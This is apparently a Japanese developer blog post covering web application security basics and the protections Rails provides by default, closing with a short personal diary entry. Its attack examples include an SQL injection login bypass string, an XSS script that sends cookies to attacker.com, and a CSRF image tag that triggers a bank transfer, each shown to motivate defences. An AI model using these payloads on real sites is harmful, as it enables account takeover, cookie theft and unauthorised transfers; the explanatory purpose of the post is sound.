Zenn
🕸️

セキュリティ対策

2023/07/29に公開
Security
tech

はじめに

アプリケーションを作成する際に考慮すべきセキュリティ対策は何があるのでしょうか?
(Railsは、セキュリティ対策として多くの機能をデフォルトで提供してくれています👀)

フレームワークを選択する際には、そのフレームワークがどのようなセキュリティ対策を提供しているのか、自分でどの程度の対策を実装する必要があるのかを理解することが重要そうです🤔

データ暗号化

  • 保存されるデータや送受信するデータは暗号化されるべきです。
  • ユーザーの個人情報やパスワードなどの重要な情報を保護するためです。
  • HTTPSなどの安全なプロトコルを用いてデータを転送することも重要です。

認証と認可

  • ユーザーが自分自身であることを確認するための認証と、ユーザーがアクセス権を持つリソースだけにアクセスできるように制御する認可のメカニズムを適切に設計し実装する必要があります。
  • パスワードポリシーを適切に設定し、二要素認証や多要素認証を提供することも検討すべきです。

セッション管理

  • セッションハイジャック攻撃からユーザーを保護するためには、セッションIDを適切に管理することが重要です。- セッションIDはランダムに生成し、定期的に再生成することでセキュリティを高めます。

コードの安全性

  • SQLインジェクションやクロスサイトスクリプティング(XSS)、クロスサイトリクエストフォージェリ(CSRF)などの攻撃からアプリケーションを保護するためには、コードの安全性を確保することが重要です。
  • 入力の検証とエスケープ、パラメータ化されたクエリの使用、安全なAPIの使用などがこれに当たります。

エラーハンドリング

  • エラーメッセージはアプリケーションの内部情報を漏洩する可能性があります。
  • 適切なエラーハンドリングにより、詳細なシステム情報がユーザーに表示されるのを防ぎます。

依存関係の管理

  • 使用しているライブラリやフレームワークは常に最新のセキュリティパッチが適用された状態に保つべきです。- - これらの依存関係は脆弱性を持つことがあり、そのためにアプリケーションが攻撃の対象となる可能性があります。

セキュリティテスト

  • ユニットテスト、統合テストに加えて、ペネトレーションテストやファジーテストなどのセキュリティテストを実施することが重要です。これにより、未知の脆弱性を見つけ出すことができます。

攻撃方法について

SQLインジェクション

ユーザーの入力が直接SQLクエリに挿入されると、攻撃者は予期しない命令を実行できます。
例えば、ユーザー名とパスワードの入力欄に ' OR '1'='1 と入力されると、以下のようなSQLクエリが生成されます:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'

この結果、 '1'='1' が常に真であるため、すべてのユーザー情報が取得され、
認証をバイパスすることが可能になります。😥

クロスサイトスクリプティング (XSS)

ユーザーの入力がエスケープされずにそのままHTMLに挿入されると、
攻撃者は悪意あるスクリプトを注入できます。例えば、掲示板のコメント欄に

<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script>

と入力されると、このスクリプトが他のユーザーのブラウザで実行され、
そのユーザーのCookie情報が攻撃者のサイトに送信されます。😥

クロスサイトリクエストフォージェリ (CSRF)

攻撃者はユーザーがログインしているウェブサイトに対するリクエストを、
ユーザーに気づかれずに送信させることができます。

例えば、攻撃者は

<img src="https://bank.com/transfer?to=attacker&amount=1000" />

というHTML要素を含むメールをユーザーに送ります。

ユーザーがメールを開いたときに、画像を読み込むためのリクエストが送信され、
その結果としてユーザーの口座から攻撃者の口座への送金が実行されます。😥

これらの攻撃を防ぐためには、、

ユーザーからの入力を適切に扱うことが重要です!

例えば、SQLインジェクションを防ぐためには、ユーザーの入力をそのままクエリに挿入する代わりに、プレースホルダとパラメータ化されたクエリを使用するべきです。

また、XSSを防ぐためには、ユーザーからの入力をHTMLに挿入する前に適切にエスケープすべきです。

CSRFを防ぐためには、重要なリクエストに対してCSRFトークンを使用するなど、
リクエストが本当にユーザー自身によるものであることを確認する方法を採用すべきです。

Ruby on Rails は、セキュリティ対策として多くの機能をデフォルトで提供しています!👀

CSRF 対策

Railsは、デフォルトで全ての非 GET リクエストに CSRF トークンを適用します。
これにより、ウェブアプリケーションは、ユーザーが自身の意図しない操作を行わないように保護されます。

SQL インジェクション対策

RailsのActiveRecordは、SQL インジェクション攻撃を防ぐために、データベースクエリのエスケープを自動で行います。

セッション管理

Railsは、セッション情報を安全に管理する機能を提供します。セッションデータは、暗号化されたクッキーに保存され、改ざんを防ぐために署名されます。

XSS 対策

Railsは、ビューテンプレートで安全に HTML をエスケープし、クロスサイトスクリプティング(XSS)攻撃を防ぎます。

安全なパスワードの保存

Railsのhas_secure_passwordメソッドを使用すると、パスワードを安全にハッシュ化してデータベースに保存することができます。

これらは一部の基本的なセキュリティ対策なので、アプリケーションの具体的な要件や状況により、
追加の対策が必要な場合があります。

以下に、それらのいくつかの例を挙げます!

認証と認可

Railsは認証(ユーザーが誰であるかの確認)や認可(ユーザーが何を行うことが許可されているかの確認)の仕組みをデフォルトで提供していません。これらは、Devise や CanCanCan などのライブラリを使用して実装することが一般的です。

ヘッダーのセキュリティ設定

HTTP セキュリティヘッダー(例えば、Content-Security-Policy、Strict-Transport-Security、X-Content-Type-Options など)は、多くの Web 攻撃を防ぐための重要な手段です。
これらのヘッダーを適切に設定するためには、SecureHeaders などのライブラリを利用できます。

ファイルアップロードのセキュリティ

ユーザーがアップロードするファイルの取り扱いには注意が必要です。
悪意のあるファイルをアップロードすることで、システムが危険にさらされる可能性があります。
適切なファイルバリデーションや、アップロードされたファイルの保存場所の選択など、慎重な設計が求められます。

ログの管理

適切なログの管理は、セキュリティ上重要な役割を果たします。
不正なアクセスの検出や、問題の原因分析に役立つ情報を提供します。
しかし、ログには機密情報を記録しないように注意することが重要です。

これらは一部の例なので、具体的なセキュリティ対策は、アプリケーションの特性、
使用する技術、対象とするユーザー、取り扱うデータの種類などによって異なります!
セキュリティは非常に広範で複雑な分野であり、常に最新の知識と注意が必要です🤔

〜日記〜

技術面接の準備やコーディングテストのおかげで、分かっていなかったこと(理解していたつもりになっていただけ)が明確に見えて、燃えています、、🔥
自己分析についても、苦手だからこそたくさん面接を受けて、自分を見つめ直している最中です。
自信持って頑張っていきましょ!🏋🏻

Discussion